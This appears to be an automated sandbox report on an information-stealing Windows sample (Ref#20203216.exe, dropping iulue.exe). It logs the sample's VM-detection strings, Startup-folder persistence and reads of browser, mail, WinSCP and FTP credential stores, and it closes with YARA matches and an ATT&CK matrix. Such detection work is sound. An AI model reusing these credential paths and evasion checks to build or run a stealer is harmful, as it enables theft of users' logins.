                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 98531Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 98421Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 98250Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 98138Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97961Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97842Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97734Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97625Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97515Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97406Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97297Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97187Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97078Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99890Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99781Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99672Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99562Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99453Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99344Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99234Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99124Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99015Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 98860Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 98749Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 98640Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 98528Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 98422Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 98313Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 98188Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 98063Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97938Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97813Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97703Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97594Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97469Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97359Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97250Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97140Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 97031Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 96922Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 96813Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 96688Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 96578Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 96469Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 96344Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 96234Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 96120Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 95854Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99766Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99641Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99516Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99406Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99297Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99181Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99062Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98950Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98842Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98729Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98609Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98500Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98391Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98266Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98156Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98027Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97922Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97813Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97688Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97563Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97438Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97313Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97188Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97077Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99890Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99781Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99671Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99451Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99342Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99234Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 99087Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98937Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98805Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98687Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98578Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98468Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98359Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98250Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98140Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 98031Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97921Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97812Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97703Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97593Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97484Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97374Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97265Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97156Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 97046Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 96937Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 96828Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 96716Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 96584Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 96453Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 96330Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 96102Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 95984Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 95874Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 95765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: Ref#20203216.exe, 00000001.00000002.2967690730.00000000061A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHA
                      Source: wscript.exe, 00000003.00000002.1867757911.000001B14E8B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: iulue.exe, 00000004.00000002.1929062673.0000000002A89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: iulue.exe, 00000004.00000002.1929062673.0000000002A89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: iulue.exe, 00000004.00000002.1926732056.0000000000D71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
                      Source: Ref#20203216.exe, 00000000.00000002.1755703275.000000000139C000.00000004.00000020.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2954784194.000000000120C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess created: C:\Users\user\Desktop\Ref#20203216.exe "C:\Users\user\Desktop\Ref#20203216.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\iulue.exe "C:\Users\user\AppData\Roaming\iulue.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess created: C:\Users\user\AppData\Roaming\iulue.exe "C:\Users\user\AppData\Roaming\iulue.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeQueries volume information: C:\Users\user\Desktop\Ref#20203216.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeQueries volume information: C:\Users\user\Desktop\Ref#20203216.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeQueries volume information: C:\Users\user\AppData\Roaming\iulue.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeQueries volume information: C:\Users\user\AppData\Roaming\iulue.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Ref#20203216.exe.41014f0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.iulue.exe.3a2fd10.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.iulue.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.iulue.exe.3a2fd10.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#20203216.exe.4164bd8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.2952721059.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2955905751.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2956983411.0000000002ECC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2955905751.0000000002CFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2956983411.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2956983411.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2955905751.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1948082008.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#20203216.exe PID: 6776, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ref#20203216.exe PID: 2120, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: iulue.exe PID: 3264, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: iulue.exe PID: 7116, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#20203216.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 0.2.Ref#20203216.exe.41014f0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.iulue.exe.3a2fd10.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.iulue.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.iulue.exe.3a2fd10.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#20203216.exe.4164bd8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.2952721059.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2956983411.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2955905751.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1948082008.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#20203216.exe PID: 6776, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ref#20203216.exe PID: 2120, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: iulue.exe PID: 3264, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: iulue.exe PID: 7116, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Ref#20203216.exe.41014f0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.iulue.exe.3a2fd10.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.iulue.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.iulue.exe.3a2fd10.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#20203216.exe.4164bd8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.2952721059.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2955905751.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2956983411.0000000002ECC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2955905751.0000000002CFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2956983411.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2956983411.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2955905751.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1948082008.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#20203216.exe PID: 6776, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ref#20203216.exe PID: 2120, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: iulue.exe PID: 3264, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: iulue.exe PID: 7116, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting
                      Valid Accounts121
                      Windows Management Instrumentation
                      111
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      2
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading
                      11
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Input Capture
                      24
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt2
                      Registry Run Keys / Startup Folder
                      2
                      Registry Run Keys / Startup Folder
                      11
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      1
                      Query Registry
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Software Packing
                      NTDS311
                      Security Software Discovery
                      Distributed Component Object Model1
                      Input Capture
                      2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets1
                      Process Discovery
                      SSHKeylogging23
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading
                      Cached Domain Credentials141
